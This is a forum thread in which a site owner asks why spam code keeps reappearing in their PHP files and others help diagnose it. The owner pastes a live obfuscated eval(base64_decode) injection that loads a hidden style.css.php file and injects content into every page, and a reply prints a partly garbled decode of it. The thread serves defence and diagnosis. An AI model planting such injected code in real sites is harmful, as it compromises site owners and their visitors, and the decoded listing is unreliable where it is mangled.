Page 1 of 1
code added to my php files
Posted: Tue Jun 16, 2009 6:29 am
by fascript
Hi we keep getting a spam code inserted somehow in to our php files , how do we stop it? we keep changing password etc in cpanel but so oftwen keep getting it ..i have just deleted it before i made the post so i cant add it but it has words like eval etc in it has anyone know of a remedy? thanks guys
Re: code added to my php files
Posted: Tue Jun 16, 2009 6:33 am
by Paul Arnold
You've probably got your permissions set too high.
Try setting them to 644.
Re: code added to my php files
Posted: Tue Jun 16, 2009 6:34 am
by fascript
Thanks but they are set at 644
Re: code added to my php files
Posted: Tue Jun 16, 2009 7:04 am
by VladSun
Who's the owner (the system one

) of these files?
Re: code added to my php files
Posted: Tue Jun 16, 2009 7:14 am
by jaoudestudios
fascript wrote:Hi we keep getting a spam code inserted somehow in to our php files
Is it definitely into your php files or into the database? and is being shown on your web pages?
Re: code added to my php files
Posted: Tue Jun 16, 2009 8:02 am
by kaisellgren
Are you saying someone has modified (keeps modifying) your PHP files?
Re: code added to my php files
Posted: Tue Jun 16, 2009 12:37 pm
by fascript
Hi yes its happened a couple of times, infact heres one i didnt clean out
<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9mcmVlYWMvcHVibGljX2h0bWwvZm9ydW1zL1RoZW1lcy9jbGFzc2ljL2ltYWdlcy90b3BpYy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvZnJlZWFjL3B1YmxpY19odG1sL2ZvcnVtcy9UaGVtZXMvY2xhc3NpYy9pbWFnZXMvdG9waWMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
Re: code added to my php files
Posted: Tue Jun 16, 2009 2:17 pm
by kaisellgren
Great... someone has cracked into your system pretty much.
It could be almost anything. FTP account exposed, vulnerable web server or a vulnerable application installed on your hosting account.
At this point I can only recommend you to update all software and remove all unnecessary software. Update all credentials (even FTP, etc) and then put your site back online. If this stops the modification of your files, then one or more applications that you updated was/were vulnerable to an attack.
Re: code added to my php files
Posted: Wed Jun 17, 2009 6:41 am
by fascript
Thanks guys for your comments, i did have someone decode it ,it looks like harmless spam .As soon as i delete it ,it comes back as if its knows lol
CODE
Posted: Wed Jun 17, 2009 6:49 am
by fascript
Is it definitely into your php files or into the database? and is being shown on your web pages?]
No nothing else is visible apart from what should be showing
Re: code added to my php files
Posted: Wed Jun 17, 2009 9:08 am
by Eric!
Are your php scripts pulling data from anywhere? A database, other sites, etc?
Does it come back immediately even after changing all your account passwords?
You should also notify your host provider, someone sharing the system with you might have found a hole to access your file structure.
Re: code added to my php files
Posted: Wed Jun 17, 2009 9:26 am
by onion2k
It decodes to this..
Code: Select all
if (function_exists('ob_start')&&!isset($GLOBALS['sh_no'])) {
$GLOBALS['sh_no'] = 1;
if(file_exists('/home/freeac/public_html/forums/Themes/classic/images/topic/style.css.php')) {
include_once('/home/freeac/public_html/forums/Themes/classic/images/topic/style.css.php');
if(function_exists('gml')&&!function_exists('dgobh')) {
if(!function_exists('gzdecode')) {
function gzdecode($var2) {
$var1 = ord(substr($var2,3,1));
$var3 = 10;
$var4 = 0;
if($var1&4) {
$var4 = unpack('v', substr($var2,10,2));
$var4 = $var4[1];
$var3 += 2+$var4;
}
if($var1&8) {
$var3 = strpos($var2,chr(0),$var3)+1;
}
if($var1&16) {
$var3 = strpos($var2,chr(0),$var3)+1;
}
if($var1&2) {
$var3 += 2;
}
$var5 = gzinflate(substr($var2,$var3));
if($var5===FALSE) {
$var5 = $var2;
}
return $var5;
}
}
function dgobh($var6) {
Header('Content-Encoding: none');
$var7 = gzdecode($var6);
if (preg_match('/\]*\>)/si','$1'.gml(),$var7);
} else {
return gml().$var7;
}
}
ob_start('dgobh');
}
}
}
It's looking for some sort of forum software. If you're using some it's been compromised. Update it to the latest version, or better still, switch to something else.